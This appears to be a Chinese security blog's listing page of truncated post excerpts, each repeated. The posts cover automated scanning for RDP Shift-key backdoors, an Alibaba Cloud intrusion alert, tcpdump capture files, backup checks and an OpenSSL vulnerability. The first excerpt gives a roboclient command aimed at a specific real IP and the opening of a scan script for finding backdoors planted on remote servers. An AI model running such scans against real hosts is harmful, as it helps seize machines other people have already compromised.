-
首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
需要用到的工具 roboclient
smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d
shift_backdoor.txt:
job
{
connect("","",...
-
今天早晨吧,收到阿里云的报警短信,说我的服务器被成功入侵,入侵者 IP47.92.147.75,查了下 IP 信息,也是北京的,而且还是阿里云的,呵呵,收到短信是四点多,八点多起床才看到,咦,好吓人,起床洗洗就出门了,赶紧到到公司看看这是神马情况,有点忐忑。。
到了...
-
前言:
在Linux下,当我们需要抓取网络数据包分析时,通常是使用工具tcpdump。但是,有时我们需要将抓取的数据包保存在一个文件中,已备以后分析。而tcpdump保存的文件是二进制的文件,使用cat和vim 都无法打开查看。此时我们采取的措施是,下载到本地使用wi...
-
03-04
前言:
随着维护服务器的增多,每天一台台检查备份已经不切实际,即使通过email的方式(备份脚本执行完后将备份信息发送到指定邮箱)检查也要耗费不少的时间,每天做这种重复性且繁杂的事情对我们这类懒人来说简直痛不欲生。经过一次惨痛的教训之后,决定...
-
02-02
还记得那个因为“心脏出血”而一夜成名的OpenSSL协议吗?它又有漏洞了。一组负责为加密协议OpenSSL做技术支持的开发人员,发现了一个新的神秘“高危”漏洞。
OpenSSL是诸如Apache和Nginx这样的开源网络服务器所使用的安全协议,这些网站占到世界上所有网站的6...
![3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]](https://img.8090st.com/2019/02/QQ截图20190221170118-430x200.png "3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]")
首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受 需要用到的工具 roboclient smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d shift_backdoor.txt: job { connect("","",...
今天早晨吧,收到阿里云的报警短信,说我的服务器被成功入侵,入侵者 IP47.92.147.75,查了下 IP 信息,也是北京的,而且还是阿里云的,呵呵,收到短信是四点多,八点多起床才看到,咦,好吓人,起床洗洗就出门了,赶紧到到公司看看这是神马情况,有点忐忑。。 到了...
前言: 在Linux下,当我们需要抓取网络数据包分析时,通常是使用工具tcpdump。但是,有时我们需要将抓取的数据包保存在一个文件中,已备以后分析。而tcpdump保存的文件是二进制的文件,使用cat和vim 都无法打开查看。此时我们采取的措施是,下载到本地使用wi...
前言: 随着维护服务器的增多,每天一台台检查备份已经不切实际,即使通过email的方式(备份脚本执行完后将备份信息发送到指定邮箱)检查也要耗费不少的时间,每天做这种重复性且繁杂的事情对我们这类懒人来说简直痛不欲生。经过一次惨痛的教训之后,决定...
还记得那个因为“心脏出血”而一夜成名的OpenSSL协议吗?它又有漏洞了。一组负责为加密协议OpenSSL做技术支持的开发人员,发现了一个新的神秘“高危”漏洞。 OpenSSL是诸如Apache和Nginx这样的开源网络服务器所使用的安全协议,这些网站占到世界上所有网站的6...
